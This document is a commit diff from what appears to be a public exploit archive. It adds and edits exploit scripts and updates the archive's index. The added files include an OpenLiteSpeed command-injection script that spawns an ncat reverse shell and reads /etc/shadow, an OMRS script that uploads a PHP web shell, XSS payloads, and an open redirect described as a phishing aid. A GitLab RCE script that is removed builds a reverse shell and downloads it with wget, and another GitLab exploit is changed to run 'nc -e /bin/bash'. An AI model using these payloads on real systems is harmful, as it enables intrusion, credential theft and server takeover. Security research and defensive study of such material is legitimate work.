2021-02-12 05:01:57 +00:00 · 2021-02-12 05:01:57 +00:00 · b96bdbcfa5
commit b96bdbcfa5
parent fcdaf2028f
8 changed files with 287 additions and 273 deletions
--- a/exploits/multiple/webapps/49556.py
+++ b/exploits/multiple/webapps/49556.py
@ -0,0 +1,142 @@
 # Exploit Title: Openlitespeed WebServer 1.7.8 - Command Injection (Authenticated) (2)
 # Date: 26/1/2021
 # Exploit Author: Metin Yunus Kandemir
 # Discovered by: cmOs - SunCSR
 # Vendor Homepage: https://openlitespeed.org/
 # Software Link: https://openlitespeed.org/kb/install-from-binary/
 # Version: 1.7.8
 import requests
 import sys
 import urllib3
 from bs4 import BeautifulSoup
 """
 Description:
 The "path" parameter has command injection vulnerability that leads to escalate privilege.
 OpenLiteSpeed (1.7.8) web server runs with user(nobody):group(nogroup) privilege. However, extUser and
 extGroup parameters could be used to join a group (GID) such as shadow, sudo, etc.
 Details: https://github.com/litespeedtech/openlitespeed/issues/217
 Example:
 Step-1:
 ubuntu@ubuntu:~$ cat /etc/shadow
 cat: /etc/shadow: Permission denied
 Step-2:
 ubuntu@ubuntu:~$ nc -nvlp 4444
 Listening on [0.0.0.0] (family 0, port 4444)
 Step-3:
 ubuntu@ubuntu:~/Desktop/exploits$ python3 openlitespeed.py 192.168.1.116:7080 admin MWE1ZmE2 shadow
 [+] Authentication was successful!
 [+] Version is detected: OpenLiteSpeed 1.7.8
 [+] The target is vulnerable!
 [+] tk value is obtained: 0.98296300 1612966522
 [+] Sending reverse shell to 127.0.0.1:4444 ...
 [+] Triggering command execution...
 Step-4:
 ubuntu@ubuntu:~$ nc -nvlp 4444
 Listening on [0.0.0.0] (family 0, port 4444)
 Connection from 127.0.0.1 54534 received!
 cat /etc/shadow
 root:!:18620:0:99999:7:::
 daemon:*:17937:0:99999:7:::
 bin:*:17937:0:99999:7:::
 sys:*:17937:0:99999:7:::
 sync:*:17937:0:99999:7:::
 .
 .
 .
 """
 def triggerCommandExec(target, s):
    data = {"act" : "restart"}
    trigger = s.post("https://"+target+"/view/serviceMgr.php", data = data, allow_redirects=False, verify=False)
    if trigger.status_code == 200:
        print("[+] Triggering command execution...")
    else:
        print("[-] Someting went wrong!")
 def commandExec(tk, groupId, s, target):
    data = {
        "name" : "lsphp",
        "address" : "uds://tmp/lshttpd/lsphp.sock",
        "note" : "",
        "maxConns" : "10",
        "env" : "PHP_LSAPI_CHILDREN=10",
        "initTimeout" : "60",
        "retryTimeout" : "0",
        "persistConn" : "1",
        "pcKeepAliveTimeout" : "",
        "respBuffer" : "0",
        "autoStart" : "2",
        "path" : "/usr/bin/ncat -nv 127.0.0.1 4444 -e /bin/bash",
        "backlog" : "100",
        "instances" : "1",
        "extUser" : "root",
        "extGroup" : groupId ,
        "umask" : "",
        "runOnStartUp" : "1",
        "extMaxIdleTime" : "",
        "priority" : "0",
        "memSoftLimit" : "2047M",
        "memHardLimit" : "2047M",
        "procSoftLimit" : "1400",
        "procHardLimit" : "",
        "a" : "s",
        "m" : "serv",
        "p" : "ext",
        "t" : "A_EXT_LSAPI",
        "r" : "lsphp",
        "tk" : tk
    }
    exec = s.post("https://" + target + "/view/confMgr.php", data = data, allow_redirects=False, verify=False)
    if exec.status_code == 200:
        if exec.text == "Illegal entry point!":
            print("[-] tk value is incorrect!")
            sys.exit(1)
        else:
            print("[+] Sending reverse shell to 127.0.0.1:4444 ...")
    else:
        print("[-] Something went wrong!")
        sys.exit(1)
    triggerCommandExec(target, s)
 def loginReq(target, username, password, groupId):
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    s = requests.Session()
    data = {"userid" : username , "pass" : password }
    login = s.post("https://" + target + "/login.php" , data = data, allow_redirects=False, verify=False)
    if login.status_code == 302:
        print("[+] Authentication was successful!")
    elif login.status_code == 200:
        print("[-] Authentication was unsuccessful!")
        sys.exit(1)
    else:
        print("[-] Connection error!")
        sys.exit(1)
    version = s.get("https://" + target + "/index.php")
    versionSource = BeautifulSoup(version.text, "html.parser")
    v = versionSource.find('div', {'class':'project-context hidden-xs'}).text
    print("[+] Version is detected: OpenLiteSpeed %s" %(v.split()[2]))
    if v.split()[2] == "1.7.8":
        print("[+] The target is vulnerable!")
    #getting tk value
    getTk = s.get("https://" + target + "/view/confMgr.php?m=serv&p=ext")
    source = BeautifulSoup(getTk.text, 'html.parser')
    tk = source.find('input', {'name':'tk'}).get('value')
    print("[+] tk value is obtained: "+tk)
    commandExec(tk, groupId, s, target)
 def main(args):
    if len(args) != 5:
        print("usage: %s targetIp:port username password groupId " %(args[0]))
        print("Example: python3 openlitespeed.py 192.168.1.116:7080 admin MWE1ZmE2 shadow")
        sys.exit(1)
    loginReq(target=args[1], username=args[2], password=args[3], groupId=args[4])
 if __name__ == "__main__":
    main(args=sys.argv)
--- a/exploits/php/webapps/49553.txt
+++ b/exploits/php/webapps/49553.txt
@ -0,0 +1,19 @@
 # Exploit Title: PEEL Shopping 9.3.0 - 'address' Stored Cross-Site Scripting
 # Date: 2021-02-11
 # Exploit Author: Anmol K Sachan
 # Vendor Homepage: https://www.peel.fr/
 # Software Link: https://sourceforge.net/projects/peel-shopping/
 # Software: : PEEL SHOPPING 9.3.0
 # Vulnerability Type: Stored Cross-site Scripting
 # Vulnerability: Stored XSS
 # Tested on Windows 10 XAMPP
 # This application is vulnerable to Stored XSS vulnerability.
 # Vulnerable script: http://localhost/peel-shopping_9_3_0/utilisateurs/change_params.php
 # Vulnerable parameters: 'Address'
 # Payload used: 
 jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert()
 )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
 # POC: in the same page where we injected payload click on the text box to edit the address.
 # You will see your Javascript code (XSS) executed.
--- a/exploits/php/webapps/49554.txt
+++ b/exploits/php/webapps/49554.txt
@ -0,0 +1,16 @@
 # Exploit Title: b2evolution 6.11.6 - 'redirect_to' Open Redirect
 # Date: 10/02/2021
 # Exploit Author: Soham Bakore, Nakul Ratti
 # Vendor Homepage: https://b2evolution.net/
 # Software Link: https://b2evolution.net/downloads/6-11-6-stable?download=12405
 # Version: 6.11.6
 # Tested on: latest version of Chrome, Firefox on Windows and Linux
 # CVE : CVE-2020-22840
 --------------------------Proof of Concept-----------------------
 1. Send the following link : http://127.0.0.1/htsrv/email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Fgoogle.com to the unsuspecting user
 2. The user will be redirected to Google.com or any other attacker controlled domain
 3. This can be used to perform malicious phishing campaigns on unsuspecting users
--- a/exploits/php/webapps/49555.txt
+++ b/exploits/php/webapps/49555.txt
@ -0,0 +1,16 @@
 # Exploit Title: b2evolution 6.11.6 - 'tab3' Reflected XSS
 # CVE: CVE-2020-22839
 # Date: 10/02/2021
 # Exploit Author: Nakul Ratti, Soham Bakore
 # Vendor Homepage: https://b2evolution.net/
 # Software Link: https://b2evolution.net/downloads/6-11-6-stable?download=12405
 # Version: 6.11.6
 # Tested on: latest version of Chrome, Firefox on Windows and Linux
 --------------------------Proof of Concept-----------------------
 Steps to Reproduce:
 1. Send the following URL http://HOST/evoadm.php?.ctrl=comments&filter=restore&tab3=123%22onmouseover=%22alert(document.domain)%22&blog=1&blog=1 to the logged in victim using any social engineering technique.
 2. When an unsuspecting user with high privileges opens this URL, XSS will be triggered  which will execute the malicious javascript payload in users browser.
 3. The vulnerable parameter in this case is “tab3”.
--- a/exploits/php/webapps/49557.py
+++ b/exploits/php/webapps/49557.py
@ -0,0 +1,79 @@
 # Exploit Title: Online Marriage Registration System (OMRS) 1.0 - Remote code execution (3)
 # Date: 10/02/2021
 # Exploit Author: Ricardo Ruiz (@ricardojoserf)
 # Vendor Homepage: https://phpgurukul.com/
 # Software Link: https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/
 # Version: 1.0
 # Tested on: Windows 10/Xampp Server and Wamp Server
 # Porting an existing exploit (https://www.exploit-db.com/exploits/49260, for macOs) to Linux/Windows. Adding the possibility of automatic registration and execution of any command without needing to upload any local file
 # Example with registration:    python3 script.py -u http://172.16.1.102:80/ -c 'whoami' 
 # Example without registration: python3 script.py -u http://172.16.1.102:80/ -c 'whoami' -m 680123456 -p dante123 
 import os
 import sys
 import random
 import argparse
 import requests
 def get_args():
    parser = argparse.ArgumentParser()
    parser.add_argument('-u', '--url', required=True, action='store', help='Url of Online Marriage Registration System (OMRS) 1.0')
    parser.add_argument('-c', '--command', required=True, action='store', help='Command to execute')
    parser.add_argument('-m', '--mobile', required=False, action='store', help='Mobile phone used for registration')
    parser.add_argument('-p', '--password', required=False, action='store', help='Password used for registration')
    my_args = parser.parse_args()
    return my_args
 def login(url, mobile, password):
    url = "%s/user/login.php"%(url)
    payload = {'mobno':mobile, 'password':password, 'login':''}
    req = requests.post(url, data=payload)
    return req.cookies['PHPSESSID']
 def upload(url, cookie, file=None):
    url = "%s/user/marriage-reg-form.php"%url
    files = {'husimage': ('shell.php', "<?php $command = shell_exec($_REQUEST['cmd']); echo $command; ?>", 'application/x-php', {'Expires': '0'}), 'wifeimage':('test.jpg','','image/jpeg')}
    payload = {'dom':'05/01/2020','nofhusband':'omrs_rce', 'hreligion':'omrs_rce', 'hdob':'05/01/2020','hsbmarriage':'Bachelor','haddress':'omrs_rce','hzipcode':'omrs_rce','hstate':'omrs_rce','hadharno':'omrs_rce','nofwife':'omrs_rce','wreligion':'omrs_rce','wsbmarriage':'Bachelor','waddress':'omrs_rce','wzipcode':'omrs_rce','wstate':'omrs_rce','wadharno':'omrs_rce','witnessnamef':'omrs_rce','waddressfirst':'omrs_rce','witnessnames':'omrs_rce','waddresssec':'omrs_rce','witnessnamet':'omrs_rce','waddressthird':'omrs_rce','submit':''}
    req = requests.post(url, data=payload, cookies={'PHPSESSID':cookie}, files=files)
    print('[+] PHP shell uploaded')
 def get_remote_php_files(url):
    url = "%s/user/images"%(url)
    req = requests.get(url)
    php_files = []
    for i in req.text.split(".php"):
        php_files.append(i[-42:])
    return php_files
 def exec_command(url, webshell, command):
    url_r = "%s/user/images/%s?cmd=%s"%(url, webshell, command)
    req = requests.get(url_r)
    print("[+] Command output\n%s"%(req.text))
 def register(mobile, password, url):
    url_r = "%s/user/signup.php"%(url)
    data = {"fname":"omrs_rce", "lname":"omrs_rce", "mobno":mobile, "address":"omrs_rce", "password":password, "submit":""}
    req = requests.post(url_r, data=data)
    print("[+] Registered with mobile phone %s and password '%s'"%(mobile,password))
 if __name__ == "__main__":
    args = get_args()
    url = args.url
    command = args.command
    mobile = str(random.randint(100000000,999999999)) if args.mobile is None else args.mobile
    password = "dante123" if args.password is None else args.password
    if args.password is None or args.mobile is None:
        register(mobile,password,url)
    cookie = login(url, mobile, password)
    initial_php_files = get_remote_php_files(url)
    upload(url, cookie)
    final_php_files = get_remote_php_files(url)
    webshell = (list(set(final_php_files) - set(initial_php_files))[0]+".php")
    exec_command(url,webshell,command)
--- a/exploits/ruby/webapps/49263.py
+++ b/exploits/ruby/webapps/49263.py
@ -1,262 +0,0 @@
 # Exploit Title: GitLab 11.4.7 Authenticated Remote Code Execution (No Interaction Required)
 # Date: 15th December 2020
 # Exploit Author: Mohin Paramasivam (Shad0wQu35t)
 # Software Link: https://about.gitlab.com/
 # POC: https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/
 # Tested on: GitLab 11.4.7 CE
 # CVE : CVE-2018-19571 (SSRF),CVE-2018-19585 (CRLF)
 import requests
 import re
 import warnings
 from bs4 import BeautifulSoup
 import sys
 import base64
 import urllib
 from random_words import RandomWords
 import argparse
 import os
 import time
 parser = argparse.ArgumentParser(description='GitLab 11.4.7 Authenticated RCE')
 parser.add_argument('-U',help='GitLab Username')
 parser.add_argument('-P',help='Gitlab Password')
 parser.add_argument('-l',help='rev shell lhost')
 parser.add_argument('-p',help='rev shell lport ',type=int)
 args = parser.parse_args()
 username = args.U
 password = args.P
 lhost = args.l
 lport = args.p
 #Retrieve CSRF Token
 warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
 gitlab_url = "http://10.129.49.62:5080"
 request = requests.Session()
 print("[+] Retrieving CSRF token to submit the login form")
 time.sleep(1)
 page = request.get(gitlab_url+"/users/sign_in")
 html_content = page.text
 soup = BeautifulSoup(html_content,features="lxml")
 token = soup.findAll('meta')[16].get("content")
 print("[+] CSRF Token : "+token)
 time.sleep(1)
 #Login
 login_info ={
            "authenticity_token": token,
            "user[login]": username,
            "user[password]": password,
            "user[remember_me]": "0"
 }
 login_request = request.post(gitlab_url+"/users/sign_in",login_info)
 if login_request.status_code==200:
 	print("[+] Login Successful")
 	time.sleep(1)
 else:
 	print("Login Failed")
 	print(" ")
 	sys.exit()
 #Exploitation
 print("[+] Running Exploit")
 time.sleep(1)
 print("[+] Using IPV6 URL 'git://[0:0:0:0:0:ffff:127.0.0.1]:6379/test/ssrf.git' to bypass filter")
 time.sleep(1)
 ipv6_url = "git%3A%2F%2F%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A6379%2Ftest%2Fssrf.git"
 r = RandomWords()
 project_name = r.random_word()
 project_url = '%s/%s/'%(gitlab_url,username)
 print("[+] Creating Project")
 time.sleep(1)
 print("[+] Project Name : "+project_name)
 time.sleep(1)
 print("[+] Creating Python Reverse Shell")
 time.sleep(1)
 python_shell = 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("%s",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'%(lhost,lport)
 os.system("touch shell.py")
 shell_file = open("shell.py","w")
 shell_file.write(python_shell)
 shell_file.close()
 print("[+] Reverse Shell Generated")
 time.sleep(1)
 print("[+] Start HTTP Server in current directory")
 print("Command : python3 -m http.server 80")
 time.sleep(2)
 http_server = raw_input("Continue (Y/N) : ")
 if (http_server=="N") or (http_server=="n"):
 	print("Start HTTP Server before running exploit")
 elif (http_server=="Y") or (http_server=="y"):
 	print("Run this script twice with options below to get SHELL!")
 	print("")
 	print("Option 1 : Download shell.py rev shell to server using wget")
 	print("Option 2 : Execute shell.py downloaded previously")
 	option = raw_input("Option (1/2) : ")
 	if option=="1":
 		reverse_shell= """\nmulti
 		 sadd resque:gitlab:queues system_hook_push
 		 lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"class_eval\\",\\"open(\\'|setsid wget http://%s/shell.py \\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"ad52abc5641173e217eb2e52\\",\\"created_at\\":1513714403.8122594,\\"enqueued_at\\":1513714403.8129568}"
 		 exec
 		 exec
 		 exec\n""" %(lhost)
 		project_page = request.get(gitlab_url+"/projects/new")
 		html_content = project_page.text
 		soup = BeautifulSoup(html_content,features="lxml")
 		project_token = soup.findAll('meta')[16].get("content")
 		namespace_id = soup.find('input', {'name': 'project[namespace_id]'}).get('value')
 		urlencoded_token1 = project_token.replace("==","%3D%3D")
 		urlencoded_token_final = urlencoded_token1.replace("+","%2B")
 		payload=b"utf8=%E2%9C%93&authenticity_token={}&project%5Bimport_url%5D={}{}&project%5Bci_cd_only%5D=false&project%5Bname%5D={}&project%5Bnamespace_id%5D={}&project%5Bpath%5D={}&project%5Bdescription%5D=&project%5Bvisibility_level%5D=0".format(urlencoded_token_final,ipv6_url,reverse_shell,project_name,namespace_id,project_name)
 		proxies = {
 			"http" : "http://127.0.0.1:8080",
 		     	"https" : "https://127.0.0.1:8080",
 			    }
 		cookies = {
 		    'sidebar_collapsed': 'false',
 		    'event_filter': 'all',
 		    'hide_auto_devops_implicitly_enabled_banner_1': 'false',
 		    '_gitlab_session':request.cookies['_gitlab_session'],
 		}
 		headers = {
 		    'Host': '10.129.49.31:5080',
 		    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
 		    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
 		    'Accept-Language': 'en-US,en;q=0.5',
 		    'Accept-Encoding': 'gzip, deflate',
 		    'Referer': 'http://10.129.49.31:5080/projects',
 		    'Content-Type': 'application/x-www-form-urlencoded',
 		    'Content-Length': '398',
 		    'Connection': 'close',
 		    'Upgrade-Insecure-Requests': '1',
 		}
 		#response = request.post('http://10.129.49.31:5080/projects',data=payload,proxies=proxies,cookies=cookies,headers=headers,verify=False)
 		response1 = request.post(gitlab_url+'/projects',data=payload,cookies=cookies,proxies=proxies,headers=headers,verify=False)
 		print("[+] Success!")
 		time.sleep(1)
 		print("[+] Run Exploit with Option 2")
 	elif option=="2":
 		reverse_shell= """\nmulti
 		 sadd resque:gitlab:queues system_hook_push
 		 lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"class_eval\\",\\"open(\\'|setsid python3 shell.py \\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"ad52abc5641173e217eb2e52\\",\\"created_at\\":1513714403.8122594,\\"enqueued_at\\":1513714403.8129568}"
 		 exec
 		 exec
 		 exec\n"""
 		project_page = request.get(gitlab_url+"/projects/new")
 		html_content = project_page.text
 		soup = BeautifulSoup(html_content,features="lxml")
 		project_token = soup.findAll('meta')[16].get("content")
 		namespace_id = soup.find('input', {'name': 'project[namespace_id]'}).get('value')
 		urlencoded_token1 = project_token.replace("==","%3D%3D")
 		urlencoded_token_final = urlencoded_token1.replace("+","%2B")
 		payload=b"utf8=%E2%9C%93&authenticity_token={}&project%5Bimport_url%5D={}{}&project%5Bci_cd_only%5D=false&project%5Bname%5D={}&project%5Bnamespace_id%5D={}&project%5Bpath%5D={}&project%5Bdescription%5D=&project%5Bvisibility_level%5D=0".format(urlencoded_token_final,ipv6_url,reverse_shell,project_name,namespace_id,project_name)
 		proxies = {
 			"http" : "http://127.0.0.1:8080",
 		     	"https" : "https://127.0.0.1:8080",
 			    }
 		cookies = {
 		    'sidebar_collapsed': 'false',
 		    'event_filter': 'all',
 		    'hide_auto_devops_implicitly_enabled_banner_1': 'false',
 		    '_gitlab_session':request.cookies['_gitlab_session'],
 		}
 		headers = {
 		    'Host': '10.129.49.31:5080',
 		    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
 		    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
 		    'Accept-Language': 'en-US,en;q=0.5',
 		    'Accept-Encoding': 'gzip, deflate',
 		    'Referer': 'http://10.129.49.31:5080/projects',
 		    'Content-Type': 'application/x-www-form-urlencoded',
 		    'Content-Length': '398',
 		    'Connection': 'close',
 		    'Upgrade-Insecure-Requests': '1',
 		}
 		#response = request.post('http://10.129.49.31:5080/projects',data=payload,proxies=proxies,cookies=cookies,headers=headers,verify=False)
 		response1 = request.post(gitlab_url+'/projects',data=payload,cookies=cookies,proxies=proxies,headers=headers,verify=False)
 		print("[+] Success!")
 		time.sleep(1)
 		print("[+] Spawning Reverse Shell")
--- a/exploits/ruby/webapps/49334.py
+++ b/exploits/ruby/webapps/49334.py
@ -1,10 +1,10 @@
-# Exploit Title: GitLab 11.4.7 - RCE (Authenticated)
+# Exploit Title: GitLab 11.4.7 RCE (POC)
 # Date: 24th December 2020
-# Exploit Author: Sam Redmond
+# Exploit Author: Norbert Hofmann
 # Original Exploit Authors: Sam Redmond, Tam Lai Yin
 # Software Link: https://gitlab.com/
 # Environment: GitLab 11.4.7, community edition
 # CVE: CVE-2018-19571 + CVE-2018-19585
 # Version: 11.4.7
 #!/usr/bin/python3
@ -26,7 +26,7 @@ username = args.u
 password = args.p
 gitlab_url = args.g + ":5080"
 local_ip = args.l
-local_port = args.p
+local_port = args.P
 session = requests.Session()
@ -56,7 +56,7 @@ print(f"[+] Creating project with random name: {project_name}")
 form = """\nmulti
    sadd resque:gitlab:queues system_hook_push
-    lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"class_eval\\",\\"open(\\'|""" + f'nc {local_ip} {local_port}' + """ \\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"ad52abc5641173e217eb2e52\\",\\"created_at\\":1608799993.1234567,\\"enqueued_at\\":1608799993.1234567}"
+    lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"class_eval\\",\\"open(\\'|""" + f'nc {local_ip} {local_port} -e /bin/bash' + """ \\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"ad52abc5641173e217eb2e52\\",\\"created_at\\":1608799993.1234567,\\"enqueued_at\\":1608799993.1234567}"
    exec
    exec
    exec\n"""
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -43231,7 +43231,7 @@ id,file,description,date,author,type,platform,port
 48549,exploits/java/webapps/48549.py,"VMWAre vCloud Director 9.7.0.15498291 - Remote Code Execution",2020-06-04,"Tomas Melicher",webapps,java,
 48550,exploits/php/webapps/48550.txt,"Navigate CMS 2.8.7 - Authenticated Directory Traversal",2020-06-04,"Gus Ralph",webapps,php,
 48551,exploits/hardware/webapps/48551.txt,"D-Link DIR-615 T1 20.10 - CAPTCHA Bypass",2020-06-04,"huzaifa hussain",webapps,hardware,
-48552,exploits/php/webapps/48552.sh,"Online Marriage Registration System 1.0 - Remote Code Execution",2020-06-04,Enesdex,webapps,php,
+48552,exploits/php/webapps/48552.sh,"Online Marriage Registration System 1.0 - Remote Code Execution (1)",2020-06-04,Enesdex,webapps,php,
 48553,exploits/multiple/webapps/48553.txt,"Cayin Content Management Server 11.0 - Remote Command Injection (root)",2020-06-04,LiquidWorm,webapps,multiple,
 48554,exploits/hardware/webapps/48554.txt,"SnapGear Management Console SG560 3.1.5 - Cross-Site Request Forgery (Add Super User)",2020-06-04,LiquidWorm,webapps,hardware,
 48556,exploits/hardware/webapps/48556.txt,"Secure Computing SnapGear Management Console SG560 3.1.5 - Arbitrary File Read",2020-06-04,LiquidWorm,webapps,hardware,
@ -43524,11 +43524,10 @@ id,file,description,date,author,type,platform,port
 49254,exploits/multiple/webapps/49254.txt,"Rumble Mail Server 0.51.3135 - 'domain and path' Stored XSS",2020-12-14,"Mohammed Alshehri",webapps,multiple,
 49255,exploits/multiple/webapps/49255.txt,"Rumble Mail Server 0.51.3135 - 'username' Stored XSS",2020-12-14,"Mohammed Alshehri",webapps,multiple,
 49256,exploits/hardware/webapps/49256.py,"Macally WIFISD2-2A82 2.000.010 - Guest to Root Privilege Escalation",2020-12-14,"Maximilian Barz",webapps,hardware,
-49257,exploits/ruby/webapps/49257.py,"Gitlab 11.4.7 - Remote Code Execution",2020-12-14,"Fortunato Lodari",webapps,ruby,
+49257,exploits/ruby/webapps/49257.py,"GitLab 11.4.7 - Remote Code Execution (Authenticated) (1)",2020-12-14,"Fortunato Lodari",webapps,ruby,
 49258,exploits/php/webapps/49258.txt,"Task Management System 1.0 - 'page' Local File Inclusion",2020-12-15,"İsmail BOZKURT",webapps,php,
-49260,exploits/php/webapps/49260.py,"Online Marriage Registration System (OMRS) 1.0 - Remote Code Execution (Authenticated)",2020-12-15,"Andrea Bruschi",webapps,php,
+49260,exploits/php/webapps/49260.py,"Online Marriage Registration System (OMRS) 1.0 - Remote Code Execution (2)",2020-12-15,"Andrea Bruschi",webapps,php,
 49262,exploits/hardware/webapps/49262.py,"Cisco ASA 9.14.1.10 and FTD 6.6.0.1 - Path Traversal (2)",2020-12-15,Freakyclown,webapps,hardware,
 49263,exploits/ruby/webapps/49263.py,"GitLab 11.4.7 - Remote Code Execution (Authenticated)",2020-12-16,"Mohin Paramasivam",webapps,ruby,
 49264,exploits/php/webapps/49264.txt,"Grav CMS 1.6.30 Admin Plugin 1.9.18 - 'Page Title' Persistent Cross-Site Scripting",2020-12-16,"Sagar Banwa",webapps,php,
 49265,exploits/linux/webapps/49265.txt,"Raysync 3.3.3.8 - RCE",2020-12-16,james,webapps,linux,
 49266,exploits/android/webapps/49266.py,"Magic Home Pro 1.5.1 - Authentication Bypass",2020-12-16,"Victor Hanna",webapps,android,
@ -43585,7 +43584,7 @@ id,file,description,date,author,type,platform,port
 49331,exploits/php/webapps/49331.txt,"Baby Care System 1.0 - 'roleid' SQL Injection",2020-12-23,"Vijay Sachdeva",webapps,php,
 49332,exploits/php/webapps/49332.txt,"WordPress Plugin Adning Advertising 1.5.5 - Arbitrary File Upload",2020-12-24,spacehen,webapps,php,
 49333,exploits/php/webapps/49333.txt,"WordPress Plugin WP-PostRatings 1.86 - 'postratings_image' Cross-Site Scripting",2020-12-24,"Park Won Seok",webapps,php,
-49334,exploits/ruby/webapps/49334.py,"GitLab 11.4.7 - RCE (Authenticated)",2020-12-24,"Sam Redmond",webapps,ruby,
+49334,exploits/ruby/webapps/49334.py,"GitLab 11.4.7 - RCE (Authenticated) (2)",2020-12-24,"Norbert Hofmann",webapps,ruby,
 49338,exploits/php/webapps/49338.txt,"Wordpress Core 5.2.2 - 'post previews' XSS",2021-01-04,gx1,webapps,php,
 49339,exploits/php/webapps/49339.txt,"4images v1.7.11 - 'Profile Image' Stored Cross-Site Scripting",2021-01-04,"Ritesh Gohil",webapps,php,
 49340,exploits/php/webapps/49340.py,"Mantis Bug Tracker 2.24.3 - 'access' SQL Injection",2021-01-04,EthicalHCOP,webapps,php,
@ -43690,7 +43689,7 @@ id,file,description,date,author,type,platform,port
 49477,exploits/php/webapps/49477.txt,"Simple College Website 1.0 - 'full' Stored Cross Site Scripting",2021-01-26,"Marco Catalano",webapps,php,
 49478,exploits/hardware/webapps/49478.txt,"Tenda AC5 AC1200 Wireless - 'WiFi Name & Password' Stored Cross Site Scripting",2021-01-26,"Chiragh Arora",webapps,hardware,
 49479,exploits/java/webapps/49479.py,"Oracle WebLogic Server 12.2.1.0 - RCE (Unauthenticated)",2021-01-26,CHackA0101,webapps,java,
-49483,exploits/multiple/webapps/49483.txt,"Openlitespeed Web Server 1.7.8 - Command Injection (Authenticated)",2021-01-27,SunCSR,webapps,multiple,
+49483,exploits/multiple/webapps/49483.txt,"Openlitespeed Web Server 1.7.8 - Command Injection (Authenticated) (1)",2021-01-27,SunCSR,webapps,multiple,
 49481,exploits/ruby/webapps/49481.txt,"STVS ProVision 5.9.10 - File Disclosure (Authenticated)",2021-01-27,LiquidWorm,webapps,ruby,
 49482,exploits/ruby/webapps/49482.html,"STVS ProVision 5.9.10 - Cross-Site Request Forgery (Add Admin)",2021-01-27,LiquidWorm,webapps,ruby,
 49484,exploits/php/webapps/49484.txt,"EgavilanMedia PHPCRUD 1.0 - 'Full Name' Stored Cross Site Scripting",2021-01-28,"Mahendra Purbia",webapps,php,
@ -43742,3 +43741,8 @@ id,file,description,date,author,type,platform,port
 49550,exploits/multiple/webapps/49550.txt,"Adobe Connect 10 - Username Disclosure",2021-02-09,h4shur,webapps,multiple,
 49551,exploits/php/webapps/49551.txt,"b2evolution 6.11.6 - 'plugin name' Stored XSS",2021-02-10,"Soham Bakore",webapps,php,
 49552,exploits/nodejs/webapps/49552.py,"Node.JS - 'node-serialize' Remote Code Execution (2)",2021-02-10,UndeadLarva,webapps,nodejs,
 49553,exploits/php/webapps/49553.txt,"PEEL Shopping 9.3.0 - 'address' Stored Cross-Site Scripting",2021-02-11,"Anmol K Sachan",webapps,php,
 49554,exploits/php/webapps/49554.txt,"b2evolution 6.11.6 - 'redirect_to' Open Redirect",2021-02-11,"Nakul Ratti",webapps,php,
 49555,exploits/php/webapps/49555.txt,"b2evolution 6.11.6 - 'tab3' Reflected XSS",2021-02-11,"Nakul Ratti",webapps,php,
 49556,exploits/multiple/webapps/49556.py,"Openlitespeed WebServer 1.7.8 - Command Injection (Authenticated) (2)",2021-02-11,"Metin Yunus Kandemir",webapps,multiple,
 49557,exploits/php/webapps/49557.py,"Online Marriage Registration System (OMRS) 1.0 - Remote code execution (3)",2021-02-11,"Ricardo Ruiz",webapps,php,